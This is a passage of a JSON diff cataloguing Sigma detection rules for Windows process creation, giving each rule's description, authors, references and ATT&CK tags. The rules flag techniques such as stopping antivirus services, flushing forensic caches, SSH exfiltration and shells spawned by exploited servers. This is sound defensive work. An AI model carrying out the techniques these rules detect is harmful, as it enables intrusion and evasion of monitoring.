"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + "attack.s0111", + "car.2013-08-001" + ] + }, + "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", + "value": "Scheduled Task Creation" + }, + { + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/11", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "value": "Suspicious Scheduled Task Creation Involving Temp Folder" + }, + { + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/11", + "falsepositive": [ + "Legitimate use by administrative staff" + ], + "filename": "proc_creation_win_susp_screenconnect_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "value": "ScreenConnect Remote Access" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "meta": { + "author": "frack113", + "creation_date": "2021/08/19", + "falsepositive": [ + "GPO" + ], + "filename": "proc_creation_win_susp_screensaver_reg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ] + }, + "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "value": "Suspicious ScreenSave Change by Reg.exe" + }, + { + "description": "Detects suspicious file execution by wscript and cscript", + "meta": { + "author": "Michael Haag", + "creation_date": "2019/01/16", + "falsepositive": [ + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." 
+ ], + "filename": "proc_creation_win_susp_script_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "value": "WSF/JSE/JS/VBA/VBE File Execution" + }, + { + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "value": "Script Interpreter Execution From Suspicious Folder" + }, + { + "description": "Detects a suspicious script executions from temporary folder", + "meta": { + "author": "Florian Roth, Max Altgelt, Tim Shelton", + "creation_date": "2021/07/14", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_script_exec_from_temp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "value": "Suspicious Script Execution From Temp Folder" + }, + { + "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/11/18", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "proc_creation_win_susp_secedit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", + "attack.privilege_escalation", + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" + ] + }, + "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "value": "Potential Suspicious Activity Using SeCEdit" + }, + { + "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", + "meta": { + "author": "Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dacl_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "value": "Suspicious Service DACL Modification" + }, + { + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet" + }, + { + "description": "Detects a service binary running in a suspicious directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dir.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", + "value": "Suspicious Service Binary Directory" + }, + { + "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", + "meta": { + "author": "frack113", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", + "value": "Stop Or Remove Antivirus Service" + }, + { + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "meta": { + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_service_path_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + 
"https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", + "value": "Suspicious Service Path Modification" + }, + { + "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Administrator or tools shutting down the services due to upgrade or removal purposes. If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" + ], + "filename": "proc_creation_win_susp_service_stop.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1489" + ] + }, + "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "value": "Suspicious Stop Windows Service" + }, + { + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "meta": 
{ + "author": "Florian Roth", + "creation_date": "2021/07/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" + ] + }, + "uuid": "75578840-9526-4b2a-9462-af469a45e767", + "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322" + }, + { + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/14", + "falsepositive": [ + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + ], + "filename": "proc_creation_win_susp_servu_process_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" + ] + }, + "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "value": "Suspicious Serv-U Process Pattern" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + 
"falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_sharpview.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/tevora-threat/SharpView/", + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ] + }, + "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "value": "Suspicious Execution of SharpView Aka PowerView" + }, + { + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", + "value": "Suspicious Usage Of ShellExec_RunDLL" + }, + { + "description": "Detects suspicious shell spawned from Java host process (e.g. 
log4j exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "creation_date": "2021/12/17", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "value": "Suspicious Shells Spawned by Java" + }, + { + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "value": "Suspicious Shells Spawn by Java Utility Keytool" + }, + { + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "meta": { + "author": "FPT.EagleEye Team, wagga", + "creation_date": "2020/12/11", + "falsepositive": "No established falsepositives", + "filename": 
"proc_creation_win_susp_shell_spawn_from_mssql.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" + ], + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "value": "Suspicious Shells Spawn by SQL Server" + }, + { + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "creation_date": "2021/05/20", + "falsepositive": [ + "Legitimate WinRM usage" + ], + "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "value": "Suspicious Processes Spawned by WinRM" + }, + { + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shimcache_flush.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": 
"b0524451-19af-4efa-a46f-562a977f792e", + "value": "ShimCache Flush" + }, + { + "description": "Use of the commandline to shutdown or reboot windows", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shutdown.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "value": "Suspicious Execution of Shutdown" + }, + { + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_splwow64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "value": "Suspicious Splwow64 Without Params" + }, + { + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "meta": { + "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "creation_date": "2021/07/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "value": "Suspicious Spool Service Child Process" + }, + { + "description": "Detects Possible Squirrel Packages Manager as Lolbin", + "meta": { + "author": "Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/11/12", + "falsepositive": [ + "1Clipboard", + "Beaker Browser", + "Caret", + "Collectie", + "Discord", + "Figma", + "Flow", + "Ghost", + "GitHub Desktop", + "GitKraken", + "Hyper", + "Insomnia", + "JIBO", + "Kap", + "Kitematic", + "Now Desktop", + "Postman", + "PostmanCanary", + "Rambox", + "Simplenote", + "Skype", + "Slack", + "SourceTree", + "Stride", + "Svgsus", + "WebTorrent", + "WhatsApp", + "WordPress.com", + "Atom", + "Gitkraken", + "Slack", + "Teams" + ], + "filename": "proc_creation_win_susp_squirrel_lolbin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", + "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fa4b21c9-0057-4493-b289-2556416ae4d7", + "value": "Squirrel Lolbin" + }, + { + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/12", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "filename": "proc_creation_win_susp_ssh_port_forward.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "value": "Suspicious SSH Port Forwarding" + }, + { + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/12", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_ssh_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "value": "Suspicious SSH Usage RDP Tunneling" + }, + { + "description": "Detects a suspicious svchost process 
start", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_svchost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "value": "Suspicious Svchost Process" + }, + { + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "meta": { + "author": "David Burkett", + "creation_date": "2019/12/28", + "falsepositive": [ + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + ], + "filename": "proc_creation_win_susp_svchost_no_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", + "value": "Suspect Svchost Activity" + }, + { + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": 
"proc_creation_win_susp_sysprep_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "value": "Sysprep on AppData Folder" + }, + { + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_systeminfo.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "value": "Suspicious Execution of Systeminfo" + }, + { + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "meta": { + "author": "Florian Roth (rule), David ANDRE (additional keywords)", + "creation_date": "2021/12/20", + "falsepositive": [ + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_system_user_anomaly.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" + ], + "tags": "No established tags" + }, + "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", + "value": "Suspicious SYSTEM User Process Creation" + }, + { + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "meta": { + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/04/09", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_sysvol_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2288", + "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "value": "Suspicious SYSVOL Domain Group Policy Access" + }, + { + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "meta": { + "author": "frack113", + "creation_date": "2022/01/30", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_win_susp_takeown.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", + 
